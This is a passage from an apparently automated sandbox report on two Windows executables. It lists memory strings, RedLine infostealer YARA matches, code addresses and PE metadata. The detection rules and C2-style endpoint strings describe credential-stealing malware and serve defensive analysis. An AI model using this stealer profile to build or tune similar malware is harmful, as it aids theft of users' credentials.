                    Source: TmfmVKU.exe, 0000000E.00000002.1966151891.0000000002C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                    Source: lZ8NRWShfC.exe, 00000008.00000002.1875131842.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, TmfmVKU.exe, 0000000E.00000002.1966151891.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                    Source: lZ8NRWShfC.exe, 00000008.00000002.1875131842.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, TmfmVKU.exe, 0000000E.00000002.1966151891.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX
                    Source: lZ8NRWShfC.exe, 00000008.00000002.1875131842.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, TmfmVKU.exe, 0000000E.00000002.1966151891.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                    Source: lZ8NRWShfC.exe, 00000000.00000002.1761163536.0000000002EB1000.00000004.00000800.00020000.00000000.sdmp, lZ8NRWShfC.exe, 00000008.00000002.1875131842.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, TmfmVKU.exe, 0000000A.00000002.1856342329.0000000003389000.00000004.00000800.00020000.00000000.sdmp, TmfmVKU.exe, 0000000E.00000002.1966151891.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: TmfmVKU.exe, 0000000E.00000002.1966151891.0000000002C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                    Source: lZ8NRWShfC.exe, 00000008.00000002.1875131842.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, TmfmVKU.exe, 0000000E.00000002.1966151891.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/0
                    Source: lZ8NRWShfC.exe, 00000008.00000002.1875131842.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, TmfmVKU.exe, 0000000E.00000002.1966151891.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
                    Source: lZ8NRWShfC.exe, 00000008.00000002.1875131842.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, TmfmVKU.exe, 0000000E.00000002.1966151891.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
                    Source: lZ8NRWShfC.exe, 00000008.00000002.1875131842.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, TmfmVKU.exe, 0000000E.00000002.1966151891.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
                    Source: lZ8NRWShfC.exe, 00000008.00000002.1875131842.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, TmfmVKU.exe, 0000000E.00000002.1966151891.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
                    Source: TmfmVKU.exe, 0000000E.00000002.1966151891.0000000002D95000.00000004.00000800.00020000.00000000.sdmp, TmfmVKU.exe, 0000000E.00000002.1966151891.0000000002C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
                    Source: TmfmVKU.exe, 0000000E.00000002.1966151891.0000000002C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdates(
                    Source: lZ8NRWShfC.exe, 00000008.00000002.1875131842.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, TmfmVKU.exe, 0000000E.00000002.1966151891.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
                    Source: TmfmVKU.exe, 0000000E.00000002.1966151891.0000000002D95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnviron
                    Source: TmfmVKU.exe, 0000000E.00000002.1966151891.0000000002D95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
                    Source: lZ8NRWShfC.exe, 00000008.00000002.1875131842.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, TmfmVKU.exe, 0000000E.00000002.1966151891.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
                    Source: lZ8NRWShfC.exe, 00000008.00000002.1875131842.0000000002A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentde
                    Source: TmfmVKU.exe, 0000000E.00000002.1966151891.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentme(
                    Source: lZ8NRWShfC.exe, 00000008.00000002.1875131842.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, TmfmVKU.exe, 0000000E.00000002.1966151891.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
                    Source: lZ8NRWShfC.exe, 00000008.00000002.1875131842.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, TmfmVKU.exe, 0000000E.00000002.1966151891.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
                    Source: lZ8NRWShfC.exe, 00000008.00000002.1880037858.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, lZ8NRWShfC.exe, 00000008.00000002.1880037858.0000000003BF1000.00000004.00000800.00020000.00000000.sdmp, TmfmVKU.exe, 0000000E.00000002.1972529480.0000000003DD9000.00000004.00000800.00020000.00000000.sdmp, TmfmVKU.exe, 0000000E.00000002.1972529480.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, tmp3C74.tmp.14.dr, tmp526.tmp.14.dr, tmp516.tmp.14.dr, tmp73A6.tmp.14.dr, tmp3C85.tmp.14.dr, tmp50CB.tmp.8.dr, tmp3CB5.tmp.14.dr, tmp509A.tmp.8.dr, tmp50DB.tmp.8.dr, tmp8760.tmp.8.dr, tmp1959.tmp.8.dr, tmp73B7.tmp.14.dr, tmp7386.tmp.14.dr, tmp3C64.tmp.14.dr, tmp8750.tmp.8.dr, tmpAA2B.tmp.14.dr, tmp872E.tmp.8.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: lZ8NRWShfC.exe, 00000008.00000002.1875131842.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp, TmfmVKU.exe, 0000000E.00000002.1966151891.0000000002C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb
                    Source: lZ8NRWShfC.exe, lZ8NRWShfC.exe, 00000008.00000002.1870267028.0000000000402000.00000040.00000400.00020000.00000000.sdmp, TmfmVKU.exe, 0000000A.00000002.1858249007.0000000004399000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
                    Source: lZ8NRWShfC.exe, lZ8NRWShfC.exe, 00000008.00000002.1870267028.0000000000402000.00000040.00000400.00020000.00000000.sdmp, TmfmVKU.exe, 0000000A.00000002.1858249007.0000000004399000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
                    Source: lZ8NRWShfC.exe, 00000008.00000002.1880037858.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, lZ8NRWShfC.exe, 00000008.00000002.1880037858.0000000003BF1000.00000004.00000800.00020000.00000000.sdmp, TmfmVKU.exe, 0000000E.00000002.1972529480.0000000003DD9000.00000004.00000800.00020000.00000000.sdmp, TmfmVKU.exe, 0000000E.00000002.1972529480.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, tmp3C74.tmp.14.dr, tmp526.tmp.14.dr, tmp516.tmp.14.dr, tmp73A6.tmp.14.dr, tmp3C85.tmp.14.dr, tmp50CB.tmp.8.dr, tmp3CB5.tmp.14.dr, tmp509A.tmp.8.dr, tmp50DB.tmp.8.dr, tmp8760.tmp.8.dr, tmp1959.tmp.8.dr, tmp73B7.tmp.14.dr, tmp7386.tmp.14.dr, tmp3C64.tmp.14.dr, tmp8750.tmp.8.dr, tmpAA2B.tmp.14.dr, tmp872E.tmp.8.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: lZ8NRWShfC.exe, 00000008.00000002.1880037858.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, lZ8NRWShfC.exe, 00000008.00000002.1880037858.0000000003BF1000.00000004.00000800.00020000.00000000.sdmp, TmfmVKU.exe, 0000000E.00000002.1972529480.0000000003DD9000.00000004.00000800.00020000.00000000.sdmp, TmfmVKU.exe, 0000000E.00000002.1972529480.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, tmp3C74.tmp.14.dr, tmp526.tmp.14.dr, tmp516.tmp.14.dr, tmp73A6.tmp.14.dr, tmp3C85.tmp.14.dr, tmp50CB.tmp.8.dr, tmp3CB5.tmp.14.dr, tmp509A.tmp.8.dr, tmp50DB.tmp.8.dr, tmp8760.tmp.8.dr, tmp1959.tmp.8.dr, tmp73B7.tmp.14.dr, tmp7386.tmp.14.dr, tmp3C64.tmp.14.dr, tmp8750.tmp.8.dr, tmpAA2B.tmp.14.dr, tmp872E.tmp.8.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: lZ8NRWShfC.exe, 00000008.00000002.1880037858.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, lZ8NRWShfC.exe, 00000008.00000002.1880037858.0000000003BF1000.00000004.00000800.00020000.00000000.sdmp, TmfmVKU.exe, 0000000E.00000002.1972529480.0000000003DD9000.00000004.00000800.00020000.00000000.sdmp, TmfmVKU.exe, 0000000E.00000002.1972529480.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, tmp3C74.tmp.14.dr, tmp526.tmp.14.dr, tmp516.tmp.14.dr, tmp73A6.tmp.14.dr, tmp3C85.tmp.14.dr, tmp50CB.tmp.8.dr, tmp3CB5.tmp.14.dr, tmp509A.tmp.8.dr, tmp50DB.tmp.8.dr, tmp8760.tmp.8.dr, tmp1959.tmp.8.dr, tmp73B7.tmp.14.dr, tmp7386.tmp.14.dr, tmp3C64.tmp.14.dr, tmp8750.tmp.8.dr, tmpAA2B.tmp.14.dr, tmp872E.tmp.8.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: lZ8NRWShfC.exe, 00000008.00000002.1880037858.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, lZ8NRWShfC.exe, 00000008.00000002.1880037858.0000000003BF1000.00000004.00000800.00020000.00000000.sdmp, TmfmVKU.exe, 0000000E.00000002.1972529480.0000000003DD9000.00000004.00000800.00020000.00000000.sdmp, TmfmVKU.exe, 0000000E.00000002.1972529480.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, tmp3C74.tmp.14.dr, tmp526.tmp.14.dr, tmp516.tmp.14.dr, tmp73A6.tmp.14.dr, tmp3C85.tmp.14.dr, tmp50CB.tmp.8.dr, tmp3CB5.tmp.14.dr, tmp509A.tmp.8.dr, tmp50DB.tmp.8.dr, tmp8760.tmp.8.dr, tmp1959.tmp.8.dr, tmp73B7.tmp.14.dr, tmp7386.tmp.14.dr, tmp3C64.tmp.14.dr, tmp8750.tmp.8.dr, tmpAA2B.tmp.14.dr, tmp872E.tmp.8.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: lZ8NRWShfC.exe, 00000008.00000002.1880037858.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, lZ8NRWShfC.exe, 00000008.00000002.1880037858.0000000003BF1000.00000004.00000800.00020000.00000000.sdmp, TmfmVKU.exe, 0000000E.00000002.1972529480.0000000003DD9000.00000004.00000800.00020000.00000000.sdmp, TmfmVKU.exe, 0000000E.00000002.1972529480.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, tmp3C74.tmp.14.dr, tmp526.tmp.14.dr, tmp516.tmp.14.dr, tmp73A6.tmp.14.dr, tmp3C85.tmp.14.dr, tmp50CB.tmp.8.dr, tmp3CB5.tmp.14.dr, tmp509A.tmp.8.dr, tmp50DB.tmp.8.dr, tmp8760.tmp.8.dr, tmp1959.tmp.8.dr, tmp73B7.tmp.14.dr, tmp7386.tmp.14.dr, tmp3C64.tmp.14.dr, tmp8750.tmp.8.dr, tmpAA2B.tmp.14.dr, tmp872E.tmp.8.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: lZ8NRWShfC.exe, 00000008.00000002.1880037858.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, lZ8NRWShfC.exe, 00000008.00000002.1880037858.0000000003BF1000.00000004.00000800.00020000.00000000.sdmp, TmfmVKU.exe, 0000000E.00000002.1972529480.0000000003DD9000.00000004.00000800.00020000.00000000.sdmp, TmfmVKU.exe, 0000000E.00000002.1972529480.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, tmp3C74.tmp.14.dr, tmp526.tmp.14.dr, tmp516.tmp.14.dr, tmp73A6.tmp.14.dr, tmp3C85.tmp.14.dr, tmp50CB.tmp.8.dr, tmp3CB5.tmp.14.dr, tmp509A.tmp.8.dr, tmp50DB.tmp.8.dr, tmp8760.tmp.8.dr, tmp1959.tmp.8.dr, tmp73B7.tmp.14.dr, tmp7386.tmp.14.dr, tmp3C64.tmp.14.dr, tmp8750.tmp.8.dr, tmpAA2B.tmp.14.dr, tmp872E.tmp.8.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: lZ8NRWShfC.exe, lZ8NRWShfC.exe, 00000008.00000002.1870267028.0000000000402000.00000040.00000400.00020000.00000000.sdmp, TmfmVKU.exe, 0000000A.00000002.1858249007.0000000004399000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/ip%appdata%
                    Source: lZ8NRWShfC.exe, TmfmVKU.exe.0.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                    Source: lZ8NRWShfC.exe, 00000008.00000002.1880037858.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, lZ8NRWShfC.exe, 00000008.00000002.1880037858.0000000003BF1000.00000004.00000800.00020000.00000000.sdmp, TmfmVKU.exe, 0000000E.00000002.1972529480.0000000003DD9000.00000004.00000800.00020000.00000000.sdmp, TmfmVKU.exe, 0000000E.00000002.1972529480.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, tmp3C74.tmp.14.dr, tmp526.tmp.14.dr, tmp516.tmp.14.dr, tmp73A6.tmp.14.dr, tmp3C85.tmp.14.dr, tmp50CB.tmp.8.dr, tmp3CB5.tmp.14.dr, tmp509A.tmp.8.dr, tmp50DB.tmp.8.dr, tmp8760.tmp.8.dr, tmp1959.tmp.8.dr, tmp73B7.tmp.14.dr, tmp7386.tmp.14.dr, tmp3C64.tmp.14.dr, tmp8750.tmp.8.dr, tmpAA2B.tmp.14.dr, tmp872E.tmp.8.drString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: lZ8NRWShfC.exe, 00000008.00000002.1880037858.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, lZ8NRWShfC.exe, 00000008.00000002.1880037858.0000000003BF1000.00000004.00000800.00020000.00000000.sdmp, TmfmVKU.exe, 0000000E.00000002.1972529480.0000000003DD9000.00000004.00000800.00020000.00000000.sdmp, TmfmVKU.exe, 0000000E.00000002.1972529480.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, tmp3C74.tmp.14.dr, tmp526.tmp.14.dr, tmp516.tmp.14.dr, tmp73A6.tmp.14.dr, tmp3C85.tmp.14.dr, tmp50CB.tmp.8.dr, tmp3CB5.tmp.14.dr, tmp509A.tmp.8.dr, tmp50DB.tmp.8.dr, tmp8760.tmp.8.dr, tmp1959.tmp.8.dr, tmp73B7.tmp.14.dr, tmp7386.tmp.14.dr, tmp3C64.tmp.14.dr, tmp8750.tmp.8.dr, tmpAA2B.tmp.14.dr, tmp872E.tmp.8.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 0.2.lZ8NRWShfC.exe.3f18560.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0.2.lZ8NRWShfC.exe.3f18560.7.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 8.2.lZ8NRWShfC.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 8.2.lZ8NRWShfC.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 10.2.TmfmVKU.exe.43b1478.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 10.2.TmfmVKU.exe.43b1478.7.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 10.2.TmfmVKU.exe.43b1478.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 10.2.TmfmVKU.exe.43b1478.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.2.lZ8NRWShfC.exe.3f30380.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0.2.lZ8NRWShfC.exe.3f30380.8.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 10.2.TmfmVKU.exe.4399658.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 10.2.TmfmVKU.exe.4399658.6.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.2.lZ8NRWShfC.exe.3f30380.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0.2.lZ8NRWShfC.exe.3f30380.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.2.lZ8NRWShfC.exe.3f18560.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0.2.lZ8NRWShfC.exe.3f18560.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 10.2.TmfmVKU.exe.4399658.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 10.2.TmfmVKU.exe.4399658.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 00000000.00000002.1761835638.0000000003F18000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 00000008.00000002.1870267028.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0000000A.00000002.1858249007.0000000004399000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: Process Memory Space: lZ8NRWShfC.exe PID: 6884, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: Process Memory Space: lZ8NRWShfC.exe PID: 7216, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: Process Memory Space: TmfmVKU.exe PID: 7308, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeCode function: 0_2_02D0D5BC0_2_02D0D5BC
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeCode function: 0_2_04F16C6B0_2_04F16C6B
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeCode function: 0_2_04F111C80_2_04F111C8
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeCode function: 0_2_04F111B80_2_04F111B8
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeCode function: 8_2_0106E7B08_2_0106E7B0
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeCode function: 8_2_0106DC908_2_0106DC90
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeCode function: 8_2_063696288_2_06369628
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeCode function: 8_2_063644688_2_06364468
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeCode function: 8_2_063612108_2_06361210
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeCode function: 8_2_063633208_2_06363320
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeCode function: 8_2_0636D1088_2_0636D108
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeCode function: 8_2_0636DD008_2_0636DD00
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeCode function: 10_2_01A6D5BC10_2_01A6D5BC
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeCode function: 10_2_031A609410_2_031A6094
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeCode function: 10_2_031A11BB10_2_031A11BB
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeCode function: 10_2_031A11C810_2_031A11C8
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeCode function: 14_2_02BAE7B014_2_02BAE7B0
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeCode function: 14_2_02BADC9014_2_02BADC90
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeCode function: 14_2_0653446814_2_06534468
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeCode function: 14_2_0653963014_2_06539630
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeCode function: 14_2_065336C814_2_065336C8
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeCode function: 14_2_0653121014_2_06531210
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeCode function: 14_2_0653DA3014_2_0653DA30
                    Source: lZ8NRWShfC.exeStatic PE information: invalid certificate
                    Source: lZ8NRWShfC.exe, 00000000.00000002.1761835638.000000000408E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs lZ8NRWShfC.exe
                    Source: lZ8NRWShfC.exe, 00000000.00000002.1761163536.0000000002EB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRT.dll. vs lZ8NRWShfC.exe
                    Source: lZ8NRWShfC.exe, 00000000.00000000.1670279738.0000000000C10000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameDDDe.exe8 vs lZ8NRWShfC.exe
                    Source: lZ8NRWShfC.exe, 00000000.00000002.1764827174.00000000062B0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs lZ8NRWShfC.exe
                    Source: lZ8NRWShfC.exe, 00000000.00000002.1761835638.0000000003F18000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs lZ8NRWShfC.exe
                    Source: lZ8NRWShfC.exe, 00000000.00000002.1761163536.0000000002F09000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs lZ8NRWShfC.exe
                    Source: lZ8NRWShfC.exe, 00000000.00000002.1763852790.0000000005980000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameRT.dll. vs lZ8NRWShfC.exe
                    Source: lZ8NRWShfC.exe, 00000000.00000002.1759317214.000000000101E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs lZ8NRWShfC.exe
                    Source: lZ8NRWShfC.exe, 00000008.00000002.1870267028.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs lZ8NRWShfC.exe
                    Source: lZ8NRWShfC.exe, 00000008.00000002.1875131842.0000000002AE5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs lZ8NRWShfC.exe
                    Source: lZ8NRWShfC.exeBinary or memory string: OriginalFilenameDDDe.exe8 vs lZ8NRWShfC.exe
                    Source: lZ8NRWShfC.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 0.2.lZ8NRWShfC.exe.3f18560.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0.2.lZ8NRWShfC.exe.3f18560.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 8.2.lZ8NRWShfC.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 8.2.lZ8NRWShfC.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 10.2.TmfmVKU.exe.43b1478.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 10.2.TmfmVKU.exe.43b1478.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 10.2.TmfmVKU.exe.43b1478.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 10.2.TmfmVKU.exe.43b1478.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.2.lZ8NRWShfC.exe.3f30380.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0.2.lZ8NRWShfC.exe.3f30380.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
